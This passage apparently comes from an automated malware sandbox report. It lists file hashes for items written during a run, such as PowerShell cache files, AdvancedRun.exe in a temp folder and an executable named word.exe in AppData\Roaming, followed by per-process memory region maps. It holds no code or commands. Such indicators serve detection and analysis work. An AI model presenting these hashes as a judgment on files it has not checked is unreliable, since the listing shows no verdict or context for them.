                          SHA512

                          a1d4836137796f155b559cb7a0723459003dbb3f4ea489c1af1358f27b1c12d2fb301d8369ebfbd4897dbe28b952529ddfb3882508959ee5d4dd78cbfeb5dd8d

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          0b5d94d20be9eecbaed3dddd04143f07

                          SHA1

                          c677d0355f4cc7301075a554adc889bce502e15a

                          SHA256

                          3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

                          SHA512

                          395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          b247e2bafd0805c90e26fb1a245109b3

                          SHA1

                          ab32ef50c866b55d584946b7ff3b65d7e0933015

                          SHA256

                          401b735e361ebdf27f67e31ade98925e9889abc09ccba7ce0c084ae72d5df1e6

                          SHA512

                          bfa0c8590fbfacc18edcc5ad7126f274beaefe056b35c94190f73cb07941c5fd2a219058e78a31c4d648ce6ed377bda6a30fb9ae6cb1e99e8574375c6db72789

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          c2d20bf472ce4533991af723a9ed44aa

                          SHA1

                          2b1255337058c9e7be64b3df9937031e3dee53bf

                          SHA256

                          7d619b029150ac255b7c0ce6a68c2093cf2a4d419356aeea34f0d4da1cdc363a

                          SHA512

                          3b82bf7f4aa8f3a75067eaa09a6ed9bdf65a4f662fa6ba835436dc978832514744fe2ebd59c21826af98b931000347059cc6947a02432a889d4bbc5db1e225e8

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          0f2c54b759a355db9315c1931443990c

                          SHA1

                          6030706bf7243d6c130d222aba027f40ed7b4550

                          SHA256

                          874dc3a7a694d3a63828c4a77615533c6f216b82f6420838eb241af53e7f9efb

                          SHA512

                          6ea92c403ac71f3e6a6fd9392456bdbb80306dfc63118e3a94f30ffea201260b96590a37e738136f99555cb22b0940f9746abe3652a1539adb510e7192c2ebdc

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          c2d20bf472ce4533991af723a9ed44aa

                          SHA1

                          2b1255337058c9e7be64b3df9937031e3dee53bf

                          SHA256

                          7d619b029150ac255b7c0ce6a68c2093cf2a4d419356aeea34f0d4da1cdc363a

                          SHA512

                          3b82bf7f4aa8f3a75067eaa09a6ed9bdf65a4f662fa6ba835436dc978832514744fe2ebd59c21826af98b931000347059cc6947a02432a889d4bbc5db1e225e8

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          c2d20bf472ce4533991af723a9ed44aa

                          SHA1

                          2b1255337058c9e7be64b3df9937031e3dee53bf

                          SHA256

                          7d619b029150ac255b7c0ce6a68c2093cf2a4d419356aeea34f0d4da1cdc363a

                          SHA512

                          3b82bf7f4aa8f3a75067eaa09a6ed9bdf65a4f662fa6ba835436dc978832514744fe2ebd59c21826af98b931000347059cc6947a02432a889d4bbc5db1e225e8

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          0f2c54b759a355db9315c1931443990c

                          SHA1

                          6030706bf7243d6c130d222aba027f40ed7b4550

                          SHA256

                          874dc3a7a694d3a63828c4a77615533c6f216b82f6420838eb241af53e7f9efb

                          SHA512

                          6ea92c403ac71f3e6a6fd9392456bdbb80306dfc63118e3a94f30ffea201260b96590a37e738136f99555cb22b0940f9746abe3652a1539adb510e7192c2ebdc

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          0f2c54b759a355db9315c1931443990c

                          SHA1

                          6030706bf7243d6c130d222aba027f40ed7b4550

                          SHA256

                          874dc3a7a694d3a63828c4a77615533c6f216b82f6420838eb241af53e7f9efb

                          SHA512

                          6ea92c403ac71f3e6a6fd9392456bdbb80306dfc63118e3a94f30ffea201260b96590a37e738136f99555cb22b0940f9746abe3652a1539adb510e7192c2ebdc

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          f732001a8a7014cbe574779f7855ef9e

                          SHA1

                          cbc700b0d35cf1fd204f600cb55fa05378da48f7

                          SHA256

                          f268c382a02044bf26296f8d2a90c4f7fea75804cd0b3a9875b9418c7765d235

                          SHA512

                          8f10b0ce7c04a2708b947d2962b607c0675712da448236787145d75a5b21f22c98419ae9f1a6724d8fdab6af665133b87e434010dbb4ba72c8c946095d88a651

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          f732001a8a7014cbe574779f7855ef9e

                          SHA1

                          cbc700b0d35cf1fd204f600cb55fa05378da48f7

                          SHA256

                          f268c382a02044bf26296f8d2a90c4f7fea75804cd0b3a9875b9418c7765d235

                          SHA512

                          8f10b0ce7c04a2708b947d2962b607c0675712da448236787145d75a5b21f22c98419ae9f1a6724d8fdab6af665133b87e434010dbb4ba72c8c946095d88a651

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          369ad5410afe9a204692f45c1f9f3f01

                          SHA1

                          9fe1083f40e26d22e12af35799dbd7bd907b7c5b

                          SHA256

                          7c0f45eeb9bc0cfc69ac3e202afcd9bd477a3dc16a09696e80e5072ed871ca8e

                          SHA512

                          d35869b864c77445e703f50905ad9135c2fbf263da22585721ae888751a00455d3731ae2ae5d1ed4d00feae3970f2c90f018f9ff7f20c42547d5a742afef4bc5

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          116cae5a15e06ac56187b3c5f9150fdb

                          SHA1

                          ed08e2acdfb017d92ad079a5cf59c67664f2e2a8

                          SHA256

                          5bbb1f8140b33a1c042e82f21a27441f8f1b7b1c3d639320d0d81c814914e58d

                          SHA512

                          462c50dacab12d4355c935756e862e66f07799d2cbd3569c94239f618534e273b38cacf5ff535fe8b51a29d738be86ebb3eb533bf87f0c9a2d0e8587e6e4d9c4

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          d2353a6001adf83b3f1cb234b1cbc170

                          SHA1

                          d30272199100d94eb2a4527f14877dd483f7f67d

                          SHA256

                          897e2ddacb8232dcb292be317d84be6fd3ce2f7fe7055c588d1e4feb67f7d200

                          SHA512

                          e0a4c03c21d11159b0e8edfe206d6fb85f32a9a3e6cd40e478a4ace2238b965a915ba9147edab1d882e21126e6b2d0121d070af50e608e4f65c83de697fad26b

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          e38af6f63a4362f5c221f8a5295eaf2b

                          SHA1

                          9e0c147afc4f734a43096702513005d769373cfb

                          SHA256

                          d1ad94d207dd4b740f7e4aac4caa468e404ac54411c32331c4b5e447bc570eac

                          SHA512

                          8c59777dec9065ad43013a665e36fd534a07f8c1bf070d5a9057ba25c4c879c8e9c9b0b2fd29244297e4ded1d433e4b30b16f1e50a8c5a46f3a6402d783ee27a

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          e38af6f63a4362f5c221f8a5295eaf2b

                          SHA1

                          9e0c147afc4f734a43096702513005d769373cfb

                          SHA256

                          d1ad94d207dd4b740f7e4aac4caa468e404ac54411c32331c4b5e447bc570eac

                          SHA512

                          8c59777dec9065ad43013a665e36fd534a07f8c1bf070d5a9057ba25c4c879c8e9c9b0b2fd29244297e4ded1d433e4b30b16f1e50a8c5a46f3a6402d783ee27a

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          71b7cb4892547a6fc02f9ba42ab3cf02

                          SHA1

                          f0f9dbd2d408bcb0c83fd0310ed4f9c6e7c53343

                          SHA256

                          6f56d9e485495f1690a114a3b8c145984b8773aa1f46bd58b5255323e1d65b22

                          SHA512

                          2a547eb4a8f8bad8d062a4f24606c5adcc0d391458004ddfebe2f03d78d52f226d2b3a04b74b11ab2ddea145d3c939cb0e262a13732261b07d178f6b9b3be71e

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          092b6a93d1985479d1ecaa48ac1fa1d1

                          SHA1

                          fbebbc9b9d2c683f253e9fe55ad5262115ef3618

                          SHA256

                          6a54b2ad2fe65b81742052d761352485fa50485042f9a0dba0cda0ce09aa5655

                          SHA512

                          49ee64c69a54b577c369a242e78fbdf41c1eabaf9ae0c7cbab9285b962d04b9509220020976ffe25c3e0a6999b8e3b2a8067423891eb6885fe4ce36368b5f952

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          a2bbd73497210aa5c8a0b6d7221892b2

                          SHA1

                          c032443e045ab960c792d7789252b48b842ca978

                          SHA256

                          cc3cc62e5269d0d50eca52a327284c13d8c918b6306886221231a19459c080e7

                          SHA512

                          1895d8212b6aa61fd74a7574a51f13e330cb420a89bcc64e435e0645e62dc4b314beebcfb4289dbbdc1c49fc6abb3a2f8a5d73db78d810141b6797db6ecdb06c

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          8e19f70971431bf769d40776eaf9a7f4

                          SHA1

                          eb9e515815c57c41849f1f16af051376c5407965

                          SHA256

                          a1fea0d8f2b88318e4c28c9400631ed04e9a8544e7a678c0893e4bf52c02b331

                          SHA512

                          e68d1fff8ab0d00a718ce6aa5a32d2a755a565d5d6f168c922f934d7715da51d80965440ee8e072cda2d862eb1576d100c9cb4cbe14b48ac464a5b671da3a53b

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          621e0731c049240d2cfb6be081fa06a7

                          SHA1

                          c92f3b67467e06aca7b322adaa158e2a1e10c183

                          SHA256

                          352144b7d0efe7930bf196620eb00595e5efd195cec51bb23b26fb3227e6c44c

                          SHA512

                          056a7368f1abfa7c0b7b9ffbc43b5ce180622896533501321f2d7bb4cd68fcbfcd96cfc7db9c8a2c38f5f742ca405d9ceb6772c1977ee07ee0377d9dfaa60423

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          621e0731c049240d2cfb6be081fa06a7

                          SHA1

                          c92f3b67467e06aca7b322adaa158e2a1e10c183

                          SHA256

                          352144b7d0efe7930bf196620eb00595e5efd195cec51bb23b26fb3227e6c44c

                          SHA512

                          056a7368f1abfa7c0b7b9ffbc43b5ce180622896533501321f2d7bb4cd68fcbfcd96cfc7db9c8a2c38f5f742ca405d9ceb6772c1977ee07ee0377d9dfaa60423

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          e72273d466e7ca9e010c69df1f5cfe97

                          SHA1

                          4e8cea1c296eb98772acc1468a933c570a00ebbd

                          SHA256

                          fd8235ad483a0af217d4e6544122d521621b37e4ce6848b0bb21d8737f620d16

                          SHA512

                          1a56fe62b662feeffced06d2656696a3fa90fc086a9c09ad5f58f07ce2b199ff14cd1dbc17cedb1c165aef435d96ae33a1b02027f7bd1d79381cc3dcba526689

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          2bddc01ea20d270da3ef3b8dd0b32791

                          SHA1

                          e3fa567dff6b906ab8c5ab323d8626d6d6c4862e

                          SHA256

                          f7a4743996b494d2666c9797eceb9829ccb093ed22d56194437552c05973572d

                          SHA512

                          133a8cd225210b4083e91e645e3ded82d7c9979c9d5e4ed38424c56c9d2ce2be88db1bb700f3f9634e7f505a27f46bd2b9a3a70b7d5049fbf92c293a92c7ceb0

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          1b9c73e01388081214028c1738f1ad91

                          SHA1

                          892168661de79de8e6bd7d6c85bb19f58ab1784d

                          SHA256

                          e602d97a20511e70ed0f600e2957a826caca98a4207e76ec17927d64468cf570

                          SHA512

                          bed56603f9cf237f7b01cbd80c27e05562a070ec536cbde9fd11c29a37ac7615611e1b61c34db4d98594ce3bbb0f164ddd3626c4ba528e6bdbf125802d815676

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          1b9c73e01388081214028c1738f1ad91

                          SHA1

                          892168661de79de8e6bd7d6c85bb19f58ab1784d

                          SHA256

                          e602d97a20511e70ed0f600e2957a826caca98a4207e76ec17927d64468cf570

                          SHA512

                          bed56603f9cf237f7b01cbd80c27e05562a070ec536cbde9fd11c29a37ac7615611e1b61c34db4d98594ce3bbb0f164ddd3626c4ba528e6bdbf125802d815676

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          cdc8a5c9cd515f08172349a452b741b4

                          SHA1

                          d29070dec5a479cde349e98713a71c5a34ecb5cb

                          SHA256

                          da4da7c322ce0408cf9a7f7d3f9d585fe5c2cb6f3f69b2989616b139b62eb37a

                          SHA512

                          3cb49ce2d7586f5bb65fce09d981e318c0bc8f9d9a209d16d66289fff5abd162f8c346559e65dff3a16c60d7a03da996f26a2af134a91bcdb8d69fc48c7a275e

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          836f339e3dd292481827bc7fc2876bad

                          SHA1

                          b6eb1d8a43d10e920087d4b57fc99d306443bd3b

                          SHA256

                          59b63cacd7e47b444297e9993f8c6a2df65c4ddb070dd1b16b220efb22e22680

                          SHA512

                          65e56e60df4aa7385dbc3c22a12a96c15283393689a7d38f625c86efe0b5a6305885480859bc769cdd2ae9303f5778d580439d253daefe7e3bf6b6ea16a53cd5

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          a601f08e7b5b0fed746a53e439c78d75

                          SHA1

                          12f3678362c9ffb510afc51065afa092fdda7cfb

                          SHA256

                          57d113c87aa2388ba589dbd83518305aa1d08462055a8921ba8c81c7a879298c

                          SHA512

                          55dcad9584df753849b41559413b05f415e1b15bd21eb6e819f5ad623f2bc55971202ce55c74d05649ba80aad245a80f5fbac60da4daf915f4d535252d90115e

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          a601f08e7b5b0fed746a53e439c78d75

                          SHA1

                          12f3678362c9ffb510afc51065afa092fdda7cfb

                          SHA256

                          57d113c87aa2388ba589dbd83518305aa1d08462055a8921ba8c81c7a879298c

                          SHA512

                          55dcad9584df753849b41559413b05f415e1b15bd21eb6e819f5ad623f2bc55971202ce55c74d05649ba80aad245a80f5fbac60da4daf915f4d535252d90115e

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          ac24b5ce4afc2133fc402f8e8bedc63b

                          SHA1

                          993a8c45eb5395b5e648be1722eac698cf10a245

                          SHA256

                          0b4ac38d73fb0f042df7d08af5bbf6985847d268dd333bcf1c96b8834fe5cbd6

                          SHA512

                          28cfcc6330c0126e97396090649c1fef563aa5424e7a673c37e99df236498091b2cba952a99a9a098696a96aef1eae253a6968f0ca8946c8d0ff35b075ad3d45

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          67efbe90c13607ebfb6a4cbde6e1d214

                          SHA1

                          af42a424547da6bc858ddea581300cd3709d23a7

                          SHA256

                          9f235519531175cc32e19d9f52f2e1507c1c60a928ac1ede61e879dffb3058ce

                          SHA512

                          e01081261f450010d5d9eb4b56ce6e90fbd0eb461853748c0769f3a1b2f8b4404c69b2c70528290141244efbf9f97041f581631148c7d355b7d35ba5a95ea26f

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          8b4363a237be21f48243290a975f9537

                          SHA1

                          c3ee5e87ec54d7b0fb34fe79e211b88e2536ecd9

                          SHA256

                          8133f66b677a99e0bb0cd264723b0747b9b8a549f7a708c1df8e53371767921c

                          SHA512

                          184fdd29140bab8557360ccb7add48a64d3b09f11b877cfd8c4393569d18cb4fc55a91cbf08b43a5cfcb2ec1d2671fbdfc72b1bad123d2bb79ecc4c7c4db5c47

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          8b4363a237be21f48243290a975f9537

                          SHA1

                          c3ee5e87ec54d7b0fb34fe79e211b88e2536ecd9

                          SHA256

                          8133f66b677a99e0bb0cd264723b0747b9b8a549f7a708c1df8e53371767921c

                          SHA512

                          184fdd29140bab8557360ccb7add48a64d3b09f11b877cfd8c4393569d18cb4fc55a91cbf08b43a5cfcb2ec1d2671fbdfc72b1bad123d2bb79ecc4c7c4db5c47

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          a1f20cef99ce0e24010d2e3232c4f826

                          SHA1

                          57e048f091a4980e2bace8d32e0cd815e7d16794

                          SHA256

                          594157c03780a26440594395fe00161a0e7e3714bf4f06c6eef9fe808d831dd5

                          SHA512

                          9bdedd2396cc869bd1cbb7eb647f649836ab24a98e9fc1d68253eb43cbc32ecbd6f51c63f38d9e2a22e863971c8c31f93b1fa51cdb8e3c84b25c85217d92ea2f

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          954694b564507e406cc284671b5161a8

                          SHA1

                          e1d8bf0594b72a0751b7137cd4ce741249aeb8e6

                          SHA256

                          229e30e40d4fd248f675d1079b914dbfebd1c24ebbb3864278a999e01ff4722e

                          SHA512

                          8d35bc7f3056498840e45044c4aee879272f3285a4ceea49b88843f45ce53f1f2be9ed2c419bb42bfc6c413a95b0c548614c23848687fe5e8f75e6eea332fe90

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          ab009095767ca988dcebda2c1d3104fc

                          SHA1

                          a64c19d0aed5ac58df4a62e220cfb4fda3b173d4

                          SHA256

                          303b6b8228c4a5cc8524a7549da8740f456a745d3320de6a8dcc2c47f971207c

                          SHA512

                          011db56eaebc8c23a03f40297de4ed8b94b15097e988694ac2fee468ec69e0c549e3f7dbae8c84e21b45cd3f66dc51e3f803429d6a79605e4580755eb3fda92e

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          69ce3150e78c21fbddf4ef61fd418f01

                          SHA1

                          10dc5e301314d411e336ee1065eb7a4b59c4a946

                          SHA256

                          3774b3a71ffb0440602b709325f2817e91fd405159823bf14ac1b556912fa851

                          SHA512

                          bf11f25f314a8e677203268270063cd839cef46681239d4d2cb342be5cc96bf3115fa9ac01b3f8637506793628fad26427948ca1896c6fb566ff42dfab12e85d

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          69ce3150e78c21fbddf4ef61fd418f01

                          SHA1

                          10dc5e301314d411e336ee1065eb7a4b59c4a946

                          SHA256

                          3774b3a71ffb0440602b709325f2817e91fd405159823bf14ac1b556912fa851

                          SHA512

                          bf11f25f314a8e677203268270063cd839cef46681239d4d2cb342be5cc96bf3115fa9ac01b3f8637506793628fad26427948ca1896c6fb566ff42dfab12e85d

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          acbe9374c6f530ef3ad45f717a6b5b0b

                          SHA1

                          ce582350a3df5abd763e183777c92a7d7d2ca63b

                          SHA256

                          f576908be574aa64c78628d366d107e6ea68b184baddd9d4fb6e868684b5d665

                          SHA512

                          ce346a3fd9a1e047462fb3a8f3e825fd310c53527a6f4252fdf8f6ab23724ee06c4332660261f4698da3331cdf91b2c1dbe204855f3a6f871090e2f565935aa6

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          8e32d4bb14bc53f5a97272fd743db229

                          SHA1

                          86ab41236d0ceac45705717affa9b4f0af76d29d

                          SHA256

                          019200cf21267771969592f1951797a509b25ed6aad911da6a3aee56a7a482ae

                          SHA512

                          37ca0091af3b4071a2cfe233a6cf87c96b6ba46014feae1fcbc1ccb49d2e33837117d7757db7fe0f676dd80f17b492fab19123e491a7d03a58298423890a49cc

                        • C:\Users\Admin\AppData\Local\Temp\9e34faa5-6f8f-44c8-897d-5296352490a6\AdvancedRun.exe
                          MD5

                          17fc12902f4769af3a9271eb4e2dacce

                          SHA1

                          9a4a1581cc3971579574f837e110f3bd6d529dab

                          SHA256

                          29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

                          SHA512

                          036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

                        • C:\Users\Admin\AppData\Local\Temp\9e34faa5-6f8f-44c8-897d-5296352490a6\AdvancedRun.exe
                          MD5

                          17fc12902f4769af3a9271eb4e2dacce

                          SHA1

                          9a4a1581cc3971579574f837e110f3bd6d529dab

                          SHA256

                          29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

                          SHA512

                          036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

                        • C:\Users\Admin\AppData\Local\Temp\9e34faa5-6f8f-44c8-897d-5296352490a6\AdvancedRun.exe
                          MD5

                          17fc12902f4769af3a9271eb4e2dacce

                          SHA1

                          9a4a1581cc3971579574f837e110f3bd6d529dab

                          SHA256

                          29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

                          SHA512

                          036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

                        • C:\Users\Admin\AppData\Roaming\word.exe
                          MD5

                          dec1f17088f0a7a17747a78f9c045416

                          SHA1

                          657099bfc8ba5522c11fe140827f5128efee4cd6

                          SHA256

                          750859f921e2e63c33234230153019d8b5a011c0fa9169f6c4f3759e142ca9fa

                          SHA512

                          6d6deb1ac75ce0918cf3eac69726489be0c61119dfd4033f53412cea5bf126fe2b58882a92120fd74d56d8c284232da3ae3afff9d67e185b40e877daedac1618

                        • C:\Users\Admin\AppData\Roaming\word.exe
                          MD5

                          dec1f17088f0a7a17747a78f9c045416

                          SHA1

                          657099bfc8ba5522c11fe140827f5128efee4cd6

                          SHA256

                          750859f921e2e63c33234230153019d8b5a011c0fa9169f6c4f3759e142ca9fa

                          SHA512

                          6d6deb1ac75ce0918cf3eac69726489be0c61119dfd4033f53412cea5bf126fe2b58882a92120fd74d56d8c284232da3ae3afff9d67e185b40e877daedac1618

                        • memory/188-71-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/188-61-0x0000000000000000-mapping.dmp
                        • memory/188-77-0x0000000006840000-0x0000000006841000-memory.dmp
                          Filesize

                          4KB

                        • memory/188-241-0x0000000006843000-0x0000000006844000-memory.dmp
                          Filesize

                          4KB

                        • memory/188-192-0x000000007EFE0000-0x000000007EFE1000-memory.dmp
                          Filesize

                          4KB

                        • memory/188-86-0x0000000006842000-0x0000000006843000-memory.dmp
                          Filesize

                          4KB

                        • memory/772-188-0x000000007EE80000-0x000000007EE81000-memory.dmp
                          Filesize

                          4KB

                        • memory/772-73-0x0000000007442000-0x0000000007443000-memory.dmp
                          Filesize

                          4KB

                        • memory/772-218-0x0000000007443000-0x0000000007444000-memory.dmp
                          Filesize

                          4KB

                        • memory/772-69-0x0000000007440000-0x0000000007441000-memory.dmp
                          Filesize

                          4KB

                        • memory/772-59-0x0000000000000000-mapping.dmp
                        • memory/772-62-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/996-657-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/996-649-0x0000000000000000-mapping.dmp
                        • memory/996-843-0x0000000006713000-0x0000000006714000-memory.dmp
                          Filesize

                          4KB

                        • memory/996-671-0x0000000006712000-0x0000000006713000-memory.dmp
                          Filesize

                          4KB

                        • memory/996-659-0x0000000006710000-0x0000000006711000-memory.dmp
                          Filesize

                          4KB

                        • memory/1580-432-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/1580-812-0x00000000070B3000-0x00000000070B4000-memory.dmp
                          Filesize

                          4KB

                        • memory/1580-418-0x0000000000000000-mapping.dmp
                        • memory/1580-449-0x00000000070B0000-0x00000000070B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/1580-457-0x00000000070B2000-0x00000000070B3000-memory.dmp
                          Filesize

                          4KB

                        • memory/2056-30-0x0000000007480000-0x0000000007481000-memory.dmp
                          Filesize

                          4KB

                        • memory/2056-26-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/2056-162-0x0000000004A93000-0x0000000004A94000-memory.dmp
                          Filesize

                          4KB

                        • memory/2056-35-0x0000000004A90000-0x0000000004A91000-memory.dmp
                          Filesize

                          4KB

                        • memory/2056-37-0x0000000004A92000-0x0000000004A93000-memory.dmp
                          Filesize

                          4KB

                        • memory/2056-139-0x000000007EE10000-0x000000007EE11000-memory.dmp
                          Filesize

                          4KB

                        • memory/2056-22-0x0000000000000000-mapping.dmp
                        • memory/2056-49-0x0000000007C60000-0x0000000007C61000-memory.dmp
                          Filesize

                          4KB

                        • memory/2056-56-0x00000000081B0000-0x00000000081B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2112-166-0x0000000009850000-0x0000000009851000-memory.dmp
                          Filesize

                          4KB

                        • memory/2112-425-0x0000000009750000-0x0000000009751000-memory.dmp
                          Filesize

                          4KB

                        • memory/2112-21-0x0000000000000000-mapping.dmp
                        • memory/2112-25-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/2112-167-0x0000000004AA3000-0x0000000004AA4000-memory.dmp
                          Filesize

                          4KB

                        • memory/2112-34-0x0000000004AA0000-0x0000000004AA1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2112-451-0x0000000009350000-0x0000000009351000-memory.dmp
                          Filesize

                          4KB

                        • memory/2112-38-0x0000000004AA2000-0x0000000004AA3000-memory.dmp
                          Filesize

                          4KB

                        • memory/2112-148-0x000000007EEE0000-0x000000007EEE1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2112-53-0x0000000008290000-0x0000000008291000-memory.dmp
                          Filesize

                          4KB

                        • memory/2188-72-0x0000000004170000-0x0000000004171000-memory.dmp
                          Filesize

                          4KB

                        • memory/2188-212-0x000000007EED0000-0x000000007EED1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2188-60-0x0000000000000000-mapping.dmp
                        • memory/2188-67-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/2188-243-0x0000000004173000-0x0000000004174000-memory.dmp
                          Filesize

                          4KB

                        • memory/2188-75-0x0000000004172000-0x0000000004173000-memory.dmp
                          Filesize

                          4KB

                        • memory/2272-16-0x0000000004E00000-0x0000000004E01000-memory.dmp
                          Filesize

                          4KB

                        • memory/2272-39-0x0000000006F80000-0x0000000006F81000-memory.dmp
                          Filesize

                          4KB

                        • memory/2272-3-0x0000000000000000-mapping.dmp
                        • memory/2272-17-0x00000000069E0000-0x00000000069E1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2272-23-0x0000000006ED0000-0x0000000006ED1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2272-9-0x0000000000480000-0x0000000000481000-memory.dmp
                          Filesize

                          4KB

                        • memory/2272-19-0x0000000006F90000-0x0000000006F91000-memory.dmp
                          Filesize

                          4KB

                        • memory/2272-8-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/2272-18-0x0000000002660000-0x00000000026DD000-memory.dmp
                          Filesize

                          500KB

                        • memory/2296-14-0x00007FF81F980000-0x00007FF81FFB7000-memory.dmp
                          Filesize

                          6.2MB

                        • memory/2296-11-0x00007FF7FC7D0000-0x00007FF7FC7E0000-memory.dmp
                          Filesize

                          64KB

                        • memory/2296-7-0x0000000000000000-mapping.dmp
                        • memory/2296-15-0x00007FF7FC7D0000-0x00007FF7FC7E0000-memory.dmp
                          Filesize

                          64KB

                        • memory/2296-13-0x00007FF7FC7D0000-0x00007FF7FC7E0000-memory.dmp
                          Filesize

                          64KB

                        • memory/2296-12-0x00007FF7FC7D0000-0x00007FF7FC7E0000-memory.dmp
                          Filesize

                          64KB

                        • memory/3116-5-0x00000000030E0000-0x00000000030F0000-memory.dmp
                          Filesize

                          64KB

                        • memory/3116-2-0x0000000002E70000-0x00000000030E0000-memory.dmp
                          Filesize

                          2.4MB

                        • memory/3436-847-0x0000000000090000-0x0000000000091000-memory.dmp
                          Filesize

                          4KB

                        • memory/3436-845-0x0000000000000000-mapping.dmp
                        • memory/3436-846-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

